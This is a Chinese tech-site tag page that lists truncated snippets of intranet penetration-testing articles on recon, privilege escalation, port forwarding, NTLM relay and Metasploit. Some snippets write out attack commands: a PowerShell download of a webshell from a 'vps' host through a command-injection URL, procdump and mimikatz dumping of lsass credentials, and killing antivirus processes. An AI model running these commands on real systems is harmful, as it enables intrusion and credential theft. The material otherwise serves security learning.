E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
#内网渗透
网吧
内网渗透
0X01准备vmware,Kalilinux,啊D网络工具包0x02初探我上网的这台电脑IP是192.168.21.128先使用kalilinux虚拟机对整个网络进行扫描!然发现192.168.1.1开放了23telnet端口!(为什么只扫到了1.x网段呢?)详解移步之前是打算用armitage,但是不知道为什么一直连接不上!用啊D直接对整个网络进行扫描192.168.1.0-192.168.25
weixin_30763397
·
2020-08-25 06:39
Web渗透初探
Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,
内网渗透
,留后门,清理痕迹。
合天智汇
·
2020-08-25 06:17
初探
内网渗透
搭建一个内网环境,做一次简单的
内网渗透
拓扑概览环境搭建渗透攻击getshell建立隧道配置代理远程桌面内网探测漏洞探测单
内网渗透
反弹shell添加路由内网扫描拓扑概览图画的有些烂,基本是这样的:0:vm1
lainwith
·
2020-08-25 06:37
作业
渗透测试
经验分享
内网渗透
——手工信息收集
下面内容来自互联网和个人总结基本命令查看用户信息查看共享信息查看ARP缓存获取系统补丁情况查看已安装软件信息查看服务信息查看进程列表查看启动项查看计划任务域环境相关命令查看域用户查看域管理员定位域控查看域控制器域信任域传送基本命令whoami:我是谁systeminfo:获知关于系统的基本信息ipconfig/all:获知网络信息查看用户信息推测网络主机命名规律netuser//查看有哪些用户ne
lainwith
·
2020-08-25 06:06
信息收集
信息安全
ATT&cK实战系列—红队实战(一)【全记录】
配置win7信息收集nmap信息收集目录爆破探测网站探测phpmyadmin探测beifen.rar网站后台渗透攻击getshell收集系统信息上传木马反弹shell连接msfwin7信息收集添加路由
内网渗透
内网主机发现
lainwith
·
2020-08-25 06:21
渗透测试
作业
web
内网渗透
之——mssql数据库提权之——xp_cmdshell执行系统命令
条件所谓利用数据进行提权,利用的其实是数据库的运行权限,所以只要我们满足以下条件即可进行提权:1、必须获得sa的账号密码或者与sa相同权限的账号密码,且mssql没有被降权。2、必须可以以某种方式执行sql语句,例如:webshell或者是1433端口的连接。提权基本思路过程与原理1.MSSQL在Windowsserver类的操作系统上,默认具有system权限。System权限在Windowss
卖N孩的X火柴
·
2020-08-25 05:45
渗透测试(内网渗透)
家里的电脑如何搭建网站【电信宽带】
如果无法获得公网IP,那只能做
内网渗透
,自己花钱买服务器搞,或者用一些第三方的服务,比如花生壳【不推荐】第三方的服务到处是收费陷阱,包括带宽限制(1M),不推荐,当然你不差钱无所谓。
skume
·
2020-08-24 15:47
安装部署
Powershell基础(一)
Powershell中可实现cmd的所有功能,反之则不可以;因为powershell可以直接调用.Net及COM对象而实现许多功能,所以黑客更倾向于在Windows中使用Powershell,并且各种花式调用在
内网渗透
中
ST小姐姐
·
2020-08-24 04:21
内网渗透
之信息收集
信息获取总是第一步执行的操作,利用管理员的疏忽或者内网机器的弱口令来发现更多的信息。①可以使用工具pwdump、mimikatz来抓取管理员hash,配合彩虹表或者在线hash破解,获得管理员的明文密码,这个可以作为自己的密码表,在进行内网其他机器的登陆时尝试。②查看远程桌面的连接信息,一般通过远程桌面经常连接的机器会在该程序打开时候的下拉菜单中保存,如果管理员选择的是记住密码的话,那么就轻松跳转
小晓晓晓林
·
2020-08-23 23:02
内网渗透
内网渗透
之简单明文抓取
前提:存在命令执行的windows服务器利用:1,将一句话木马上传到自己的vps上,通过命令执行漏洞,执行命令将一句话木马下载到服务器当中(需要知道绝对路径)http://url?pwd=zs&cmd=cmd+/c+powershell+(new-objectSystem.Net.WebClient).DownloadFile('http://vps/shell.txt','C:/绝对路径/shy
shy014
·
2020-08-23 22:24
内网渗透
14.社会工程学和apt
apt可使用工具CobaltStrike,cs主要用于
内网渗透
以及APT攻击。
皮蛋是个臭蛋
·
2020-08-22 23:06
内网渗透
之——内网本机信息收集(一些常用的查看命令以及获取管理员密码)
1.获取当前用户密码点此跳转我的另一篇文章,里面详细介绍了windows和linux各种获取密码的方式2.查看用户列表windows:netuserlinux:cat/etc/passwd3.查看进程列表windows:tasklist关闭进程(比如杀毒软件,找到后直接关闭):taskkill/pid进程号linux静态:psaux 动态:top4.查看服务类别windows:(已经启动的服务,查
卖N孩的X火柴
·
2020-08-22 20:13
渗透测试(内网渗透)
001--
内网渗透
之信息收集
当我们通过渗透进入内网环境后,对网络拓扑一无所知,测试人员应先对当前网络环境做出判断。对当前机器角色分析,对机器所处网络环境拓扑结构分析,对机器所处区域分析。从而展开下一步攻击。对机器所处网络环境分析对所处内网进行全面数据收集和分析整理,绘制出大致的内网整体结构拓扑。对机器所处区域分析判断机器所处于网络拓扑哪个区域,是在DMZ区、办公区、核心区。区域并不是绝对的,所以区域界限也是相对的。落地机角色
Min1996
·
2020-08-22 19:33
渗透测试
内网渗透
内网渗透
(下)
在次声明:
内网渗透
是及其敏感的问题,实战之中一定要理智,不要越线。在项目中没有明确的授权,做
内网渗透
100%违法。至于挖掘src时,更是不能碰的东西,大家且行且珍惜。
划水的小白白
·
2020-08-22 19:53
网络小白进阶路
内网渗透
--基于密码的破解提权
密码获取的常用手段1、通过中间人劫持:网络窃听2、通过用户主机窃听:键盘记录3、通过简单猜测:常用密码4、通过系统漏洞:永恒之蓝5、用户自己泄漏:git、配置文件等泄漏方式6、通过系统后门:shift后门windows密码原理Windows使用了两种方法对用户的密码进行哈希处理,分别为LANManager(LM)哈希和NTLANManager(NTLM)哈希。所谓哈希(hash),就是使用--种加
hee_mee
·
2020-08-20 23:32
Learing
内网渗透
--windows提权
Windows提权整体思路windows提权常见方法内核提权错误的服务权限配置DLL注入始终以高权限安装程序凭证存储内核提权通过检查目标主机,检查目标主机是否存在已知的漏洞检测脚本错误的服务权限配置windowsserver可创建长久运行的可执行程序,若能获取的修改windowsserver配置权限,通过把服务启动的二进制文件替换为恶意二进制文件,可以获得system权限检查错误配置脚本–Powe
hee_mee
·
2020-08-20 23:32
Learing
内网渗透
--linux提权
Linux提权思路提权方法LinuxSUID提权#查找所有者为用户的文件find/-typef-user用户名2>dev/null#查看带有root权限的SUID命令find/typef-perm-u=s2>/dev/nullfind/-perm-g=s-o-perm-u=s-typef2>/dev/null-typed目录-typeb块设备文件-typec字符设备文件-typep管道文件-typ
hee_mee
·
2020-08-20 23:32
Learing
简单
内网渗透
思路
常听闻
内网渗透
一把梭,但不曾深入了解,今天就学学。
梦想成为安全大佬的男人
·
2020-08-20 21:05
Web安全
Kali环境的基本配置
一.配置静态ip首先把虚拟机的网络适配器设置成桥接模式:直接连接到物理网络大家都知道,要想进行
内网渗透
攻击,你必须要在那个内网里。
腾天
·
2020-08-20 21:57
内网主机扫描和利用的网页框架Sonar.js
如果你有过
内网渗透
的经验,就会发觉这种情况的可怕之处。
45zq
·
2020-08-20 20:53
谈谈CMD中那些命令混淆的姿势
在
内网渗透
的时候,执行CMD命令难免会被杀软拦截,因为杀软规则库的不同,可能会体现出不同的效果。总的来说能绕过还是很开心的事情。基于本人在学习上的研究,希望将一些姿势拿出来与大家分享一下。
Master先生
·
2020-08-18 23:36
内网渗透
cmd
安全
安全漏洞
Redis未授权访问在windows下的利用
在某次
内网渗透
中遇到了redis+windows的环境,由于目标较为敏感因此在本地和uknow大佬一起进行了测试,也因此有了下面的文章。
洪小帮主
·
2020-08-18 22:32
安全
浅析
内网渗透
代理
作者:zjun原文:https://xz.aliyun.com/t/8001这篇文章列举出我用过的内网代理方法,也算是对
内网渗透
代理姿势的巩固,也方便日后查阅。
「已注销」
·
2020-08-18 20:41
内网渗透
之mimikatz+procdump 提取 Windows 明文密码
0x00原理获取到内存文件lsass.exe进程(它用于本地安全和登陆策略)中存储的明文登录密码。0x01操作Windows10/2012以下的版本:1、上传procdump执行命令转存出lsass.dmp文件(需要管理员权限)procdump64.exe-accepteula-malsass.exelsass.dmp2、拿到mimikatz文件夹执行命令读明文:sekurlsa::minidum
Adminxe
·
2020-08-18 19:12
渗透小助手——几个密码收集工具
本文转自360安全播报在渗透测试中,尤其是在
内网渗透
中,收集密码是渗透师必做的事情。今天小编就来给大家推荐几个收集密码的实用小工具。当然这些工具不仅仅是可以用在渗透中,实际生活中有时也能帮到我们。
weixin_30783913
·
2020-08-18 04:21
内网渗透
之——reduh端口转发工具使用介绍
1.将reDuhServers\reDuh.aspx上传到网站目录2.攻击机使用reDuhClient\dist\reDuhClient.jar连接刚刚上传的reDuh.aspx文件,会在本地生成一个1010端口java-jarDesktop\reDuh-master\reDuhClient\dist\reDuhClient.jarhttp://192.168.16.129/reduh.aspx3
卖N孩的X火柴
·
2020-08-17 07:20
渗透测试(内网渗透)
内网渗透
代理、端口转发工具Termite
特点:工具在多种操作系统下均有Agent实现,由于代码为标准C实现,所以未来还将有更多的平台被支持。Agent节点可相互连接,进而形成一条树状管理拓扑,依赖该拓扑结构,使用者可实时管理拓扑中的任意主机节点。管理员可通过Admin程序,对拓扑中的任意节点进行管控,包括但不限于文件传输/控制台命令执行/开启远程SOCKS5代理服务/远程端口转发,等功能。#Usage1.以服务模式启动一个agent服务
王大泥巴
·
2020-08-17 07:49
内网渗透
内网渗透
端口转发
内网转发
代理
端口代理
内网渗透
测试:NTLM Relay攻击分析
目录基础知识NTLM认证过程NTLM中继攻击原理获得Net-NTLMRelay的思路利用LLMNR和NetBIOS欺骗获得Net-NTLMHash利用WPAD劫持获得Net-NTLMHashSMBRelay(SMB中继)攻击攻击演示Responder中的MultiRelayx.pyImpacket中的smbrelayx.pyMetasploit中的smb_relay模块(ms08-068)Impc
whatday
·
2020-08-17 07:42
内网渗透
-正向代理
代理技术代理技术包括:正向代理、反向代理和透明代理,其中正向代理技术应用最为广泛。大部分情况下,出于安全性考虑,公司组建的局域网只有部分主机能够被互联网上的其它主机访问。正向代理技术在局域网中外网可访问主机设置代理功能,使得外部主机通过代理主机可以访问局域网内所有主机和资源。正向代理正向代理:简单的说,就是客户端主动向代理发送一个请求,然后代理向服务器请求并将获取的内容返回给客户端。比如A想向C借
ClearSkyQQ
·
2020-08-17 07:48
渗透测试
Metasploit
内网渗透
大杀器
一、基础用法1.数据库连接#1首先启动postgresql数据库:/etc/init.d/postgresqlstart;或者servicepostgresqlstart;#2初始化MSF数据库(关键步骤!):msfdbinit;#3运行msfconsole:msfconsole;#4在msf中查看数据库连接状态:db_status。如果不想每次开机都这样,还可以配置随系统启动update-rc.
Wh0ale
·
2020-08-17 05:36
工具使用
内网渗透
之msf工具详解
一.文件目录date目录存储数据documentation目录文档目录lib目录存储ruby脚本modules目录存储模块和插件tools目录存储小工具二.基础使用msfdbinit初始化并启动数据库db_status查看数据库状态msfconsole控制台(可以使用kage实现界面化)help帮助exit退出show进行罗列模板search搜索模块名或cve编号back返回上一级info查看模块
鸣蜩十四
·
2020-08-17 05:28
内网渗透
linux
内网渗透
之——内网转发(反弹shell、端口、代理)
转发目的渗透测试中,我们往往会面对十分复杂的内网环境,比如最常见的防火墙,它会限制特定端口的数据包出入,此时就需要内网转发转发情景1.A可以访问B的80端口,但是不能访问B的3389端口。2.A可以访问B,B可以访问C,但是A不可以访问C,需要通过B转发数据,让A和C进行通信。代理方式正向代理:正向代理是服务器开放端口,客户端主动访问服务器的端口我们常说的代理就是指正向代理,正向代理的过程,它隐藏
卖N孩的X火柴
·
2020-08-17 05:39
渗透测试(内网渗透)
干货|
内网渗透
之端口转发&端口映射
文章转自乌云安全公众号,对我帮助比较大,欢迎老铁们关注端口转发端口转发,有时被叫做隧道,是安全壳为网络安全通信使用的一种方法。端口转发是转发一个网络端口从一个网络端口转发到另一个网络端口或从一个网络节点转发到另一个网络节点的行为,其使一个外部用户从外部经过一个被激活的NAT路由器到达一个在私有内部IP地址(局域网内网)上的一个端口。简要说明:端口转发就是将一个端口,这个端口可以本地的端口也可以是访
阿南-anan
·
2020-08-17 05:02
安全系列
内网渗透
-代理/端口转发
端口转发想学很久了,看了很多大佬的文章,但是看了就忘了-。-所以选择记下来然后都实际操作一波。虽然以后还是会往,唉。代理代理分为正向代理和反向代理正向代理正向代理我理解就是你的请求通过代理给服务器,服务器只能看到代理的请求,不会发现你的存在。比如很多的ssr代理等,通过服务器访问目标,目标是不会察觉到你的存在的。通俗点的理解是:A想向C借钱,但是C不认识A所以不借给他,然后A就通过B向C借钱,B借
流苏吖
·
2020-08-17 04:16
内网渗透
网络
内网渗透
-msf路由转发与端口转发
测试环境路由转发端口转发在渗透的过程中常常会遇到这种场景:我们已经通过web渗透拿下一台内网服务器,为了进一步进行
内网渗透
,我们会利用“沦陷主机”作为跳板进行进一步的
内网渗透
,扩大战果。
葵花与巷_
·
2020-08-17 04:36
内网安全
目前最新《Metasploit系列WEB安全渗透教程(第二季)(Tools羽翼)》
mp4Metasploit第二季第04课hash值传递渗透.mp4Metasploit第二季第05课Ndproxy内核提权.mp4Metasploit第二季第06课多种后面生成.mp4Metasploit第二季第07课
内网渗透
一� 一 �
·
2020-08-16 16:58
小白必读记——
内网渗透
之漏洞扫描类(Burpsuite工具讲解,初学篇)
信息搜集讲过之后,然后就是不得不提的必备工具Burpsuite工具首先我们先讲这个必备神奇工具,其他后面在讲!无论多简单还是多复杂的,一定要多多练习。1.1Burpsuite注:现在有汉化版的,建议小白可以用。1.1.1功能介绍BurpSuite是Web应用程序测试的最佳工具之一,其多种功能可以帮我们执行各种任务.请求的拦截和修改,扫描web应用程序漏洞,以暴力破解登陆表单,执行会话令牌等多种的随
太白神羽酒
·
2020-08-16 16:20
后渗透之meterpreter学习笔记
0x00前言由于最近想学习关于
内网渗透
的一些知识,前面也有师傅写了关于meterpreter的使用攻略,我这里就来复现学习一下。
小白白@
·
2020-08-16 16:59
工具
渗透-基于metasploit的
内网渗透
- ms10-002漏洞 - ms-15-020漏洞利用及其原理分析
渗透-基于metasploit的
内网渗透
-ms10-002漏洞-ms-15-020漏洞利用及其原理分析漏洞利用及其原理分析在前面已经讲了利用metaspolit工具利用ms08-067漏洞进行的
内网渗透
joke_ljh
·
2020-08-16 16:11
metasploit内网渗透
渗透- 基于metasploit的
内网渗透
- ms08-067漏洞利用及其原理分析
ms08-067漏洞利用
内网渗透
:利用漏洞:Ms08-067使用工具metasploit前提:靶机具有ms08-067漏洞(可以用nessus扫描),在同一局域网,且具有连通性。
joke_ljh
·
2020-08-16 16:39
metasploit内网渗透
内网渗透
中转发工具总结
最近一段时间
内网渗透
做的比较多,刚好今天比较有时间,就总结一下内网中转发的一些工具的使用。
ru_li
·
2020-08-16 14:37
信息安全
【渗透神器系列】Metasploit
【文章于2017.08.01发布在个人博客】今天玩了一把
内网渗透
,其中主要用到了metasploit这款
内网渗透
神器。
nmask
·
2020-08-16 13:13
内网渗透
笔记(三):MS12-020漏洞利用
前言:漏洞介绍:MS12-020是远程桌面中的漏洞,如果攻击者向受影响的系统发送一系列特制RDP数据报,则这些漏洞中教严重的漏洞可能允许远程执行代码。(出自百度)实验环境:虚拟机攻击者操作系统:KaliLinux2019.1靶机操作系统:WindowXpSP2一、扫描使用Nnessus扫描靶机后发现存在MS12-020漏洞:二、利用进入metasploit控制台,查找漏洞:searchms12-2
hg666hh
·
2020-08-16 12:53
安全
CVE-2018-8174漏洞复现及
内网渗透
攻击
文章目录说明CVE-2018-8174漏洞简介Persistence后门环境搭建拓扑图Winserver2008对Windows7开启1433端口内网攻击过程1号机获得2号机的权限利用CVE-2018-8174漏洞获取2号机(Windows7)权限,添加攻击者用户添加超级隐藏管理员账户使用vbs脚本上传SQLTOOLS.exe从Windows7进攻Windowsserver2008对Windwss
Waldocsdn
·
2020-08-16 11:10
【网络安全】
#
———内网
内网渗透
笔记(一):搭建Nessus漏洞扫描工具
一、安装Nessus打开kalilinux,使用如下命令:dpkg-iNessus-8.3.1-debian6_i386.deb//安装Nessus/etc/init.d/nessusdstart//开启Nessus在浏览器中输入:https://IP:8834,进入配置界面:在配置过程中,出现问题:此时,返回kalilinux,运行命令:/opt/nessus/sbin/nessusclifet
hg666hh
·
2020-08-16 10:45
安全
提权初探
参考教程
内网渗透
详解此文作为一个学习笔记基础命令windowswhoami#查看当前用户权限queryuser#查看用户登陆情况systeminfo#查看当前系统版本与补丁信息netuseruserpassword
R0oKi3
·
2020-08-14 23:00
中间人攻击
正好在公司有机会玩玩
内网渗透
,于是实践一下中间人攻击我所在的网段为10.0.100.0/24攻击者主机IP:10.0.100.133受害者主机IP:10.0.100.136网关:10.0.100.1扫描主机先用
cf1ybird
·
2020-08-14 07:43
网络安全
内网渗透
之PTH
PTH(pass-the-hash)pass-the-hash在
内网渗透
中是一种很经典的攻击方式,原理就是攻击者可以直接通过LMHash和NTLMHash访问远程主机或服务,而不用提供明文密码。
cxk331
·
2020-08-13 23:10
内网渗透
内网渗透
内网渗透
我们首先先讲一下,如何去利用sql注入漏洞先讲两个导出文件的函数intodumpfile'C:\\phpstudy\\WWW\\123.txt'//写文件的一个函数,后面接路径intooutfile'C
白白c
·
2020-08-13 22:42
黑盒测试
【
内网渗透
】域渗透技巧 => 第三方工具API
前言域管理进程转移,使得渗透测试人员能够模拟在互联网上的域名管理员账户进行操作。尽管如此,在渗透测试开始之前需要确认系统中进程是否运行。在这篇博文中,我讲介绍5个技巧来帮助大家去做这些事情。本地检测查询活跃的域控制器扫描远程系统上运行的任务扫描远程系统上NetBIOS信息PSExec扫描远程系统上的身份验证令牌获取域名管理员权限在大多数情况下,本篇文章关注的焦点在于识别运行于域名管理进程的系统。以
qq_27446553
·
2020-08-13 16:04
Windows渗透
上一页
10
11
12
13
14
15
16
17
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他